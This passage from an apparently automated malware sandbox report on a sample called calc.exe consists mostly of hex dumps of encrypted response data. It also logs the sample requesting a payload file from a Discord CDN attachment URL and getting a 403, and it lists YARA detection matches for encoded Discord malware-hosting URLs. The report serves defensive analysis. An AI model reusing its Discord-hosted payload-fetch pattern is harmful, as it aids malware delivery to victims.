                                                                                                                                                                        2021-10-28 02:56:06 UTC756INData Raw: 60 58 67 4d 5c 73 36 4a 58 73 69 56 46 09 20 27 70 4c 5b 50 00 47 52 27 3f c3 9c c3 97 c2 a1 c2 9e c2 85 c3 a0 c3 82 c2 92 c2 b4 c2 9c c2 b1 c2 95 c2 ac c2 9a c2 aa c2 95 c2 ac c2 94 c2 ad c2 af c3 82 c3 a6 c3 a4 c2 b8 c3 9c c3 88 c2 86 c2 84 c2 bc c2 8a c2 aa c2 87 c2 96 c2 a7 c2 88 c2 81 c3 b6 c3 bf c3 9c c2 8b c2 8c c2 bd c2 a7 c3 90 c2 88 c2 9f c2 b9 c2 81 c2 82 c2 9d c2 98 c2 93 c3 a6 c3 85 c3 80 c2 98 c3 bd c2 82 c2 80 c2 a5 c2 94 c2 8e c2 9c c2 83 c3 ba c3 9a c3 b2 c2 85 c2 b0 c2 90 c2 b1 c3 b8 c2 96 c3 83 c3 94 c3 8e c3 82 c3 af c3 bd c3 b3 c3 aa c3 8a c3 b1 c3 ad c2 ad c2 a5 c2 ab c3 b8 c2 95 c3 ac c3 bc c3 bf c2 85 c3 89 c3 87 c3 95 c3 96 c3 a7 c3 88 c2 a6 c3 a5 c2 ba c2 99 c3 9b c3 98 c3 a3 c3 8b c3 b4 c3 86 c3 9f c3 bb c2 b6 c3 84 c3 86 c3 85
                                                                                                                                                                        Data Ascii: `XgM\s6JXsiVF 'pL[PGR'?
                                                                                                                                                                        2021-10-28 02:56:06 UTC772INData Raw: 11 2b 4c 30 3b 6d 6e 66 77 58 67 47 0f 6c 7d 65 7c 69 37 32 11 5d 63 5a 72 4c 6a 53 62 5c 07 79 75 43 41 10 1b 4d 3d 6b 44 42 37 4d 52 6c 20 36 41 73 71 2e 0f 5e 53 5a 5b 0d 53 4f 3a 3a 27 38 57 58 1f c3 a3 c3 99 c2 9e c2 80 c2 85 c2 b7 c2 be c2 af c2 ae c2 ba c2 a4 c2 b9 c2 a1 c2 ad c2 bd c2 86 c3 a0 c3 a0 c3 ad c3 9f c2 9f c2 bb c2 9a c3 86 c2 b9 c2 ae c2 9d c2 bd c2 be c2 be c2 8e c3 ac c3 94 c3 9f c2 8d c3 ae c3 be c2 80 c2 82 c3 b6 c2 91 c2 92 c2 ac c3 a1 c2 99 c2 82 c2 b3 c2 a6 c2 b1 c3 ad c2 98 c2 96 c3 a0 c3 b1 c3 94 c3 ae c2 b2 c2 87 c2 8d c2 8b c2 82 c2 ac c2 99 c3 87 c2 86 c2 81 c3 8e c3 b2 c3 8f c3 a7 c3 a2 c2 9d c3 ba c3 90 c3 b4 c3 bd c3 8a c3 a7 c3 9c c2 bd c2 b0 c2 ab c3 87 c3 af c3 a7 c3 bb c3 92 c3 bb c3 bd c3 8e c3 82 c2 87 c2 8b c3 97
                                                                                                                                                                        Data Ascii: +L0;mnfwXgGl}e|i72]cZrLjSb\yuCAM=kDB7MRl 6Asq.^SZ[SO::'8WX
                                                                                                                                                                        2021-10-28 02:56:06 UTC788INData Raw: 36 56 23 34 39 3f 2c 6a 68 6e 01 06 45 32 0e 18 71 3d 13 0d 1a 26 1c 5a 58 5e 2a 1a 0d 1a 3d 1a 11 07 1b 04 19 1f 0c 4a 48 4e 37 18 6c 5f 40 78 10 42 66 66 18 5a 71 28 49 0b 47 68 1c 4f 50 68 66 55 60 66 6e 44 6c 2a 28 2e 4a 19 05 7e 4e 66 56 7c 6e 52 64 78 7f 32 1b 35 72 4c 42 74 66 48 52 76 79 7c 5a 73 69 1c 31 3c 77 48 5e c2 81 c2 ae c2 ac c3 99 c2 8c c2 8b c2 a2 c3 9d c2 80 c2 b4 c3 b3 c3 ab c3 90 c2 91 c2 a8 c2 ae c2 8d c2 be c2 bc c2 a2 c2 8a c2 99 c3 96 c2 a9 c2 99 c2 8f c2 99 c2 9c c3 83 c2 97 c2 8c c2 93 c2 8a c2 ad c2 8a c2 81 c2 97 c2 8b c2 94 c2 89 c2 8f c2 9c c3 9a c3 98 c3 9e c2 aa c2 9a c2 8d c2 9a c2 bd c2 95 c2 91 c3 b6 c2 98 c2 ae c2 99 c2 9c c2 8c c3 8a c3 88 c3 8e c2 ba c2 8a c2 9d c3 aa c3 8d c3 aa c3 a1 c3 b7 c3 ab c3 b4 c3 ac c2 81
                                                                                                                                                                        Data Ascii: 6V#49?,jhnE2q=&ZX^*=JHN7l_@xBffZq(IGhOPhfU`fnDl*(.J~NfV|nRdx25rLBtfHRvy|Zsi1<wH^
                                                                                                                                                                        2021-10-28 02:56:06 UTC804INData Raw: 9d c2 92 c2 81 c2 bc c3 ab c3 95 c3 93 c3 90 c3 b7 c3 93 c3 9c c3 b5 0d 41 05 50 31 75 75 75 1b 4e 3f 19 25 09 3b 04 3e 23 3c 19 03 5d 66 4c 3a 34 2b 1f 18 3c 2b 17 2e 05 78 2b 19 57 42 6e 27 14 2d 30 05 03 2a 3a 3b 1a 13 39 23 6d 45 6a 34 14 14 3e 32 33 1c 0c 6e 73 6c 64 71 35 35 35 5f 64 7f 10 60 63 7b 48 5b 65 51 5f 79 3c 36 14 7c 1e 0d 57 72 7c 77 5b 56 7f 75 69 72 07 60 33 7d 4b 6d 75 43 37 47 6d 7d 6f 7e 72 64 03 2c 34 5d 75 2d 5b 70 51 71 63 c2 8d c2 9f c3 94 c2 9c c2 91 c3 a3 c2 81 c3 9a c2 87 c2 bb c2 bb c3 91 c2 a2 c2 a3 c2 95 c2 8d c2 a6 c3 90 c2 bb c3 85 c2 ba c3 b7 c3 a6 c3 8f c2 bf c2 bb c2 9d c2 9c c2 b2 c3 87 c2 ac c2 8a c2 96 c2 8a c2 9b c3 b5 c2 b1 c3 97 c3 96 c3 bb c2 b4 c2 8b c2 8f c2 ab c2 bb c2 9c c2 84 c2 a8 c2 9c c2 a5 c2 9f c2 80
                                                                                                                                                                        Data Ascii: AP1uuuN?%;>#<]fL:4+<+.x+WBn'-0*:;9#mEj4>23nsldq555_d`c{H[eQ_y<6|Wr|w[Vuir`3}KmuC7Gm}o~rd,4]u-[pQqc
                                                                                                                                                                        2021-10-28 02:56:06 UTC820INData Raw: a4 c2 ba c2 97 c2 ab c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8b c3 85 c3 99 c3 91 c3 9d c3 a7 c3 ad c3 88 c2 8b c2 8c c2 87 c3 a7 c3 87 c3 96 c3 9f c3 ba c3 9f c3 9a c3 8a c3 94 c3 89 c3 91 c3 9f c3 9b 64 4b 79 1d 41 30 29 1e 37 2c 2f 25 3e 23 29 3a 60 62 60 04 51 30 30 08 40 43 2e 25 5f 20 2c 3a 40 52 50 24 10 07 0c 2b 04 04 1a 10 1a 26 2e 09 54 4d 44 26 07 6f 1b 2f 14 32 0e 00 1e 10 1c 2f 29 39 08 5f 66 13 1d 5c 79 64 54 47 58 63 69 7a 20 22 20 41 66 0f 57 43 66 42 66 6d 78 7c 57 4a 06 66 3d 64 50 47 4c 6b 44 44 29 67 71 48 64 79 2f 11 15 6f 59 5c 2f 5b 46 54 64 55 4e 50 4c 51 c3 a9 c3 b9 c2 83 c2 a4 c2 a6 c2 a8 c2 81 c2 a9 c2 96 c2 ab c2 b9 c2 a5 c2 be c2 a0 c2 be c2 98 c2 93 c3 b5 c3 98 c2 b6 c2 96 c2 b7 c2 bc c2 9b c2 b0 c2 bb c2 a9 c2 b5 c2 ae c2 b0 c2 bc
                                                                                                                                                                        Data Ascii: dKyA0)7,/%>#):`b`Q00@C.%_ ,:@RP$+&.TMD&o/2/)9_f\ydTGXciz " AfWCfBfmx|WJf=dPGLkDD)gqHdy/oY\/[FTdUNPLQ
                                                                                                                                                                        2021-10-28 02:56:06 UTC836INData Raw: bc c2 ba c2 b8 c2 be c3 8a c3 ba c3 ad c3 ba c3 9d c3 be c3 be c3 90 c3 9e c3 b2 c3 80 c3 95 c3 8f c2 82 c2 8d c3 9f c3 92 c3 ac c3 90 c3 be c3 88 c3 8c c3 96 c3 af c3 a9 c3 9d c3 82 c3 a2 c3 b9 c2 98 c2 9b c3 af c3 8a c3 9c c3 99 c3 bc c3 b1 c3 b1 c3 99 c2 b5 c3 96 c3 9d c3 92 c3 b2 c3 ae c3 b8 c2 8b c2 b9 c3 99 c3 a5 2d 06 0e 2b 26 36 28 35 25 3b 1f 08 52 49 01 39 25 4b 13 13 21 56 35 0d 21 4e 22 43 78 1f 11 2d 19 3c 0c 23 05 3c 10 0c 15 27 17 5d 50 68 0a 37 66 36 26 69 05 37 3b 76 63 2c 07 42 44 62 34 12 75 50 55 79 66 5b 4a 4d 65 5f 5c 14 30 4e 52 6d 75 51 5c 5d 76 66 78 65 76 7e 6f 2b 2f 2f 52 72 56 7f 65 52 52 62 43 4c 52 7a 54 02 0b 1f 69 5b 52 5b 7e 5f 5d 6f 43 47 55 4e 5f 1c 00 19 74 3a c2 b5 c2 bb c2 9a c3 9b c2 be c2 90 c2 8a c2 99 c2 b1 c2 95
                                                                                                                                                                        Data Ascii: -+&6(5%;RI9%K!V5!N"Cx-<#<']Ph7f6&i7;vc,BDb4uPUyf[JMe_\0NRmuQ\]vfxev~o+//RrVeRRbCLRzTi[R[~_]oCGUN_t:
                                                                                                                                                                        2021-10-28 02:56:06 UTC852INData Raw: 81 c3 85 c3 85 c3 85 c2 bf c2 8d c2 98 c2 91 c2 b0 c2 97 c2 99 c2 9f c3 ad c3 b7 c3 ac c3 a7 c3 b1 c2 b5 c2 b5 c2 b5 c3 8f c3 bd c3 a8 c3 a1 c3 80 c3 a5 c3 ac c3 bc c3 be c3 a3 c3 bc c3 b4 c3 a1 c2 a5 c2 a5 c2 a5 c3 9f c3 ad c3 b8 c3 b1 c3 90 c3 b5 c3 bc c3 ac c3 8e c3 93 c3 8c c3 84 c3 91 c2 95 c2 95 c2 95 c3 af c3 9d c3 88 c3 81 c3 a0 c3 85 c3 8c c3 9c c3 9e c3 83 c3 9c c3 94 c3 81 c2 85 c2 85 c2 85 c3 bf c3 8d c3 98 c3 91 c3 b0 c3 95 c3 9c 33 2f 30 2d 23 30 76 74 7a 0e 3e 29 26 01 26 2d 23 3f 20 3d 33 20 66 64 6a 1e 2e 39 36 11 36 3d 13 0f 10 0d 03 10 56 54 5a 2e 1e 09 06 21 06 0d 03 1f 00 1d 13 00 46 44 4a 3e 0e 19 16 31 16 1d 73 6f 70 6d 63 70 36 34 3a 67 6e 6d 66 41 6e 6d 63 7f 60 7d 73 60 26 24 2a 5e 6e 79 76 51 76 7d 53 4f 50 4d 43 50 16 14 1a 17
                                                                                                                                                                        Data Ascii: 3/0-#0vtz>)&&-#? =3 fdj.966=VTZ.!FDJ>1sopmcp64:gnmfAnmc`}s`&$*^nyvQv}SOPMCP
                                                                                                                                                                        2021-10-28 02:56:06 UTC868INData Raw: b2 c3 86 c2 a6 c3 ba c2 86 c3 a3 c2 ae c2 a5 c2 8b c3 b3 c2 9f c2 bf c2 9e c2 b2 c2 84 c2 b8 c2 b9 c3 86 c3 95 c3 aa c2 be c2 92 c3 a2 c2 ba c2 ae c2 86 c3 a3 c2 b1 c2 8e c2 9c c2 90 c2 b3 c2 91 c2 a9 c2 a1 c2 99 c3 a4 c3 a6 c3 91 c3 8a c3 a8 c3 b6 c3 ac c2 8d c3 ad c3 b8 c3 a8 c3 84 c3 b2 c2 a6 c2 a5 c3 93 c3 8c c3 b6 c3 9a c3 8e c3 83 c3 a6 c3 b0 c3 9b c3 ae c3 bc c3 b0 c3 88 c3 89 c2 b8 c2 91 c3 a1 c3 84 c3 96 c3 93 c3 aa c3 bc c2 b3 c3 a6 c3 ad c3 9e c3 98 c2 bb c2 bb c3 b8 c2 b8 c2 81 c2 95 c3 90 c3 99 c3 98 c2 ad c3 a0 c3 86 c2 aa c3 af c3 8e c3 97 c3 88 c3 b4 16 5e 61 57 20 37 5c 02 09 07 28 38 22 3f 20 28 25 61 61 61 18 38 38 1b 1e 34 3b 5d 39 3a 30 4d 03 53 7b 51 23 11 04 0d 24 03 1f 23 0a 1d 71 2e 0e 58 4d 41 26 2d 03 32 17 63 0b 39 0a 16 03 35
                                                                                                                                                                        Data Ascii: ^aW 7\(8"? (%aaa884;]9:0MS{Q#$#q.XMA&-2c95
                                                                                                                                                                        2021-10-28 02:56:06 UTC884INData Raw: 87 c3 bb c3 a4 c3 bf c2 89 c2 ab c2 b2 c2 bb c2 9e c2 bb c2 98 c2 a6 c2 b8 c2 a5 c2 b6 c2 be c2 af c3 ab c3 af c3 af c2 9b c2 ab c2 82 c2 8b c2 ae c2 8b c2 86 c2 96 c2 88 c2 95 c2 83 c2 82 c3 a7 c3 9b c3 84 c3 9f c2 a9 c2 8b c2 92 c2 9b c2 be c2 9b c2 8e c2 86 c2 98 c2 85 c2 96 c2 9e c2 8f c3 8b c3 8f c3 8f c2 bd c2 8b c3 a2 c3 ab c3 8e c3 ab c3 a6 c3 b6 c3 a8 c3 b5 c3 a3 c3 b6 c2 87 c2 bb c2 a4 c2 bf c3 89 c3 ab c3 b2 c3 bb c3 9e c3 bb c3 90 c3 a6 c3 b8 c3 a5 c3 b6 c3 be c3 af c2 ab c2 af c2 af c3 91 c3 ab c3 82 c3 8b c3 ae c3 8b c3 86 c3 96 c3 88 c3 95 c3 85 c3 ac c3 8b c2 ad c2 84 c2 9f c3 a9 c3 8b c3 92 c3 9b c3 be c3 9b c3 86 c3 86 c3 98 c3 85 c3 96 c3 9e c3 8f c2 8b c2 8f c2 8f c3 a9 34 23 28 0f 2c 27 35 29 3a 22 03 46 7c 65 7c 08 34 33 38 1f 3c 15
                                                                                                                                                                        Data Ascii: 4#(,'5):"F|e|438<
                                                                                                                                                                        2021-10-28 02:56:06 UTC900INData Raw: 5a 6f 44 40 49 69 7d 6f 51 53 40 06 04 0a 7a 45 51 5f 71 54 5d c2 bb c2 af c2 b0 c2 ad c2 97 c2 a8 c3 99 c3 bb c3 81 c2 8e c2 be c2 a9 c2 a6 c2 81 c2 a6 c2 af c2 85 c2 bc c2 96 c2 bf c2 81 c2 b1 c3 80 c3 a4 c3 aa c2 93 c2 81 c2 ba c2 9c c2 89 c2 af c2 ae c2 ba c2 8f c2 90 c2 8d c2 83 c3 a5 c3 96 c3 b6 c3 9a c2 b6 c2 9e c2 89 c2 86 c2 a1 c2 84 c3 b9 c2 bb c2 bd c3 b2 c2 96 c2 b8 c2 8b c3 83 c3 84 c3 b3 c2 be c2 8e c2 99 c2 96 c2 b1 c2 90 c2 98 c3 95 c3 ac c3 86 c3 af c3 a3 c3 b0 c2 a6 c2 b4 c2 ba c3 83 c3 91 c3 a2 c3 9d c3 a3 c3 8a c3 a1 c3 89 c3 b3 c3 a5 c3 b5 c3 b3 c3 a0 c2 a6 c2 a4 c2 aa c3 9e c3 ae c3 b9 c3 b6 c3 91 c3 b6 c3 bd c3 93 c3 8f c3 90 c3 8d c3 83 c3 90 c2 96 c2 94 c2 9a c3 ae c3 9e c3 89 c3 86 c3 a1 c3 86 c3 8d c3 83 c3 9f c3 80 c3 9d c3 93
                                                                                                                                                                        Data Ascii: ZoD@Ii}oQS@zEQ_qT]
                                                                                                                                                                        2021-10-28 02:56:06 UTC916INData Raw: 31 13 31 5b 7d 7c 6e 44 68 5f 7e 62 6f 65 1d 68 21 03 21 5b 71 60 7f 54 71 6c 19 71 49 73 0e 6c 37 15 11 4e 73 5c 4e 64 50 7e 63 41 69 40 61 45 01 01 01 57 38 4c 5e 74 5a 41 4e 52 5f 55 21 c2 b9 c3 87 c3 93 c3 b1 c2 8b c2 a1 c2 a4 c2 af c2 84 c2 a1 c2 ab c3 89 c2 a1 c2 89 c2 a3 c2 8e c2 9c c3 87 c3 a5 c3 a1 c2 b7 c3 98 c2 ac c2 be c2 94 c2 a0 c2 9e c2 9a c2 b1 c2 99 c2 b0 c2 a3 c2 92 c3 a7 c3 81 c3 91 c2 a1 c2 9e c2 8c c2 89 c2 86 c2 81 c2 87 c2 be c2 82 c2 b4 c2 83 c3 b9 c2 87 c3 91 c3 99 c3 81 c2 a5 c2 81 c2 94 c2 9d c2 b4 c2 93 c2 9e c2 9a c2 91 c2 a9 c2 92 c2 8a c3 a2 c2 b2 c2 a1 c2 b1 c3 8e c2 9b c3 b4 c3 a2 c3 84 c3 a1 c3 b1 c2 89 c3 a7 c3 bf c3 a2 c3 b8 c3 9d c2 a1 c2 a5 c2 a1 c3 a8 c2 98 c3 92 c3 be c3 94 c3 b5 c3 9e c2 99 c3 b1 c3 99 c3 b0 c3 91
                                                                                                                                                                        Data Ascii: 11[}|nDh_~boeh!![q`TqlqIsl7Ns\NdP~cAi@aEW8L^tZANR_U!
                                                                                                                                                                        2021-10-28 02:56:06 UTC932INData Raw: 3a 2a 34 1f 26 6c 7e 6c 6c 13 0f 01 2f 0e 03 15 09 1a 05 3b 17 6a 4e 5c 31 06 13 1c 3f 12 04 10 1a 3c 17 1e 0c 6a 5e 4c 3a 5f 73 60 4f 6c 49 4d 6a 57 67 44 7d 2c 36 3c 4b 72 63 7e 5f 7c 77 56 7a 6a 77 65 64 1a 3e 2c 51 53 53 41 6f 4e 43 52 49 7c 47 4a 7b 1c 3c 1c 6e 46 61 5c 7f 5e 75 76 5a 4a 57 73 59 0c 2c 0c 70 c2 a4 c2 a3 c2 a8 c2 8f c2 af c2 81 c2 86 c2 aa c2 ba c2 a7 c2 82 c2 b4 c3 8a c3 ae c3 bc c2 82 c2 a3 c2 a3 c2 b1 c2 9f c2 be c2 b3 c2 a5 c2 b9 c2 aa c2 b7 c2 bd c2 a4 c3 9a c3 be c3 ac c2 9e c2 96 c2 b1 c2 8c c2 af c2 8f c2 be c2 81 c2 8a c2 ac c2 87 c2 96 c2 94 c3 8c c3 b4 c3 9c c2 af c3 b7 c2 83 c2 bd c2 bf c2 9f c2 b2 c2 91 c2 90 c2 8a c2 97 c2 84 c2 81 c3 8f c3 bc c3 8c c2 bf c3 82 c3 a7 c3 b0 c3 8f c3 af c3 a4 c3 83 c3 a9 c3 ba c3 a4 c2 9c
                                                                                                                                                                        Data Ascii: :*4&l~ll/;jN\1?<j^L:_s`OlIMjWgD},6<Krc~_|wVzjwed>,QSSAoNCRI|GJ{<nFa\^uvZJWsY,p
                                                                                                                                                                        2021-10-28 02:56:06 UTC948INData Raw: 80 c2 86 c2 84 c2 8a c3 be c3 8e c3 99 c3 96 c3 b1 c3 87 0b 58 2f 07 2a 22 33 77 7b 7b 29 36 5f 2e 02 27 32 22 3c 21 3a 32 04 51 49 6b 1d 2f 3e 37 12 37 75 11 0f 27 0a 02 13 57 5b 5b 3b 30 7b 0e 22 07 12 02 1c 01 19 00 24 61 69 4b 3d 0f 1e 17 32 19 16 18 6f 47 6a 62 73 37 3b 3b 5c 77 6a 6e 42 67 72 62 7c 61 79 76 45 37 09 2b 5d 6f 7e 77 52 73 35 51 4f 67 4a 42 53 17 1b 1b 7b 57 4a 4e 62 47 52 42 5c 41 5f 5c 64 17 29 0b 7d 4f 5e 57 72 5f c3 96 c3 98 c2 af c2 87 c2 aa c2 a2 c2 b3 c3 b7 c3 bb c3 bb c2 bd c2 90 c3 9b c2 ae c2 82 c2 a7 c2 b2 c2 a2 c2 bc c2 a1 c2 bf c2 a4 c2 84 c3 b7 c3 89 c3 ab c2 9d c2 af c2 be c2 b7 c2 92 c2 bf c2 99 c3 b8 c2 8f c2 a7 c2 8a c2 82 c2 93 c3 97 c3 9b c3 9b c2 bd c2 96 c3 bb c2 8e c2 a2 c2 87 c2 92 c2 82 c2 9c c2 81 c2 9a c2 a6
                                                                                                                                                                        Data Ascii: X/*"3w{{)6_.'2"<!:2QIk/>77u'W[[;0{"$aiK=2oGjbs7;;\wjnBgrb|ayvE7+]o~wRs5QOgJBS{WJNbGRB\A_\d)}O^Wr_
                                                                                                                                                                        2021-10-28 02:56:06 UTC964INData Raw: b3 c2 b7 c2 95 c2 91 c3 94 c2 a4 c3 8c c3 8e c3 a4 c3 84 c3 ae c3 ae c3 81 c3 a9 c3 82 c2 a6 c3 a3 c2 a7 c2 85 c2 81 c3 b5 c3 89 c3 98 c3 9e c3 b4 c3 96 c3 88 c3 be c3 91 c3 b9 c3 90 01 12 44 74 76 12 47 29 21 05 22 39 08 20 0a 22 32 02 54 64 66 63 57 39 31 15 31 39 18 30 1a 34 12 32 64 54 56 56 67 09 01 25 00 19 28 00 2a 04 38 22 74 44 46 58 2c 19 11 35 17 3f 38 10 3a 11 67 5d 32 34 36 45 07 75 61 45 66 5f 4a 60 4a 61 6e 4d 22 24 26 4b 6a 65 71 55 76 5f 58 70 5a 72 65 7d 12 14 16 79 27 55 41 65 45 7f 68 40 6a 43 57 6d 02 04 06 02 37 73 51 75 5a 49 7b 50 7a 54 c2 91 c2 9c c3 b2 c3 b4 c3 b6 c3 ac c2 b9 c2 b1 c2 a1 c2 85 c2 a4 c2 b9 c2 89 c2 a0 c2 8a c2 a1 c2 b7 c2 89 c3 84 c3 a4 c3 a6 c2 97 c3 96 c2 ad c2 b1 c2 95 c2 bb c2 a9 c2 96 c2 b0 c2 9a c2 b1 c2 96
                                                                                                                                                                        Data Ascii: DtvG)!"9 "2TdfcW9119042dTVVg%(*8"tDFX,5?8:g]246EuaEf_J`JanM"$&KjeqUv_XpZre}y'UAeEh@jCWm7sQuZI{PzT
                                                                                                                                                                        2021-10-28 02:56:06 UTC980INData Raw: af c2 ac c2 ae c2 bc c3 bd c3 a1 c2 86 c3 bc c3 9f c3 b7 c3 a7 c3 b1 c3 ba c3 9c c3 b2 c3 bd c3 bf c2 8a c2 be c2 ac c2 a0 c3 af c2 b6 c3 8c c3 af c3 87 c3 97 c3 81 c3 8a c3 ac c3 87 c3 8d c3 8f c2 aa c2 8e c2 9c c2 9d c3 90 c3 97 c3 9c c3 bf c3 99 c3 97 c3 92 c3 9a c3 bc c3 92 c3 ab c3 9e c2 9c c2 9e c2 8c 12 21 28 2d 08 26 34 20 25 0d 27 3c 29 5b 6d 7d 2c 31 3c 3d 18 3a 24 4e 35 1d 31 2c 39 5b 7d 6d 2a 64 10 0d 28 06 14 00 05 2d 06 1c 0a 5d 4d 5d 24 11 08 1d 38 0c 2d 10 15 3d 17 0c 1a 6b 5d 4d 51 61 46 6d 48 65 4d 72 65 4d 67 4a 6b 3d 2d 3d 21 71 56 7d 58 78 74 73 75 5d 71 4a 7b 2d 3d 2d 77 52 44 4d 68 40 6d 40 45 6d 47 4c 4d 0d 0d 1d 5d 52 54 5d 78 56 44 50 55 7d 56 7a 5d 1d 1d 0d c3 b6 c2 a2 c2 a8 c2 ad c2 88 c2 a6 c2 b4 c2 a0 c2 a5 c2 8d c2 a1 c2 8a
                                                                                                                                                                        Data Ascii: !(-&4 %'<)[m},1<=:$N51,9[}m*d(-]M]$8-=k]MQaFmHeMreMgJk=-=!qV}Xxtsu]qJ{-=-wRDMh@m@EmGLM]RT]xVDPU}Vz]


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        1192.168.2.549707162.159.135.233443C:\Users\user\Desktop\calc.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        2021-10-28 02:56:06 UTC994OUTGET /attachments/897223707649515602/897228595318124554/ascii_ART.txt HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                        2021-10-28 02:56:06 UTC994INHTTP/1.1 403 Forbidden
                                                                                                                                                                        Date: Thu, 28 Oct 2021 02:56:06 GMT
                                                                                                                                                                        Content-Type: application/xml; charset=UTF-8
                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                        Connection: close
                                                                                                                                                                        CF-Ray: 6a50e397b8ab1756-FRA
                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                        Expires: Thu, 28 Oct 2021 02:56:06 GMT
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        CF-Cache-Status: MISS
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                        X-GUploader-UploadID: ADPycdso1L-ylGX3bmenRtNOQmdon87QxmC7cXUyPENI7fDPUtJpk_9x5Bbi4ZgqkkYUdWdLYHwGtl2nhQu3WyOEx-8lP-t6kA
                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X0aOWmo3%2Bd2J5p5kYEmgATNoxtwSQamhuDwF0HfeVv3A%2FULL0goDlzj8myWfYgoN8Wz%2BTegRCRL%2FE6v2%2BH8q99WsdaRWi95pVvtRlzG%2F%2B%2BEfjTXgU25DZRc%2Botur%2FhsNBmyD9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        2021-10-28 02:56:06 UTC995INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                                                                                                        Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>


                                                                                                                                                                        Code Manipulations

                                                                                                                                                                        Statistics

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        General

                                                                                                                                                                        Start time:04:56:03
                                                                                                                                                                        Start date:28/10/2021
                                                                                                                                                                        Path:C:\Users\user\Desktop\calc.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:'C:\Users\user\Desktop\calc.exe'
                                                                                                                                                                        Imagebase:0x320000
                                                                                                                                                                        File size:192000 bytes
                                                                                                                                                                        MD5 hash:CE76AE9D476B9C0DAA25DAF4C6DD4909
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.252642988.0000000000322000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000002.291985012.0000000000322000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.245005606.0000000000322000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.254525892.0000000002677000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.254621493.00000000026D3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000002.293367777.00000000026D3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.253884839.0000000000322000.00000002.00020000.sdmp, Author: Florian Roth
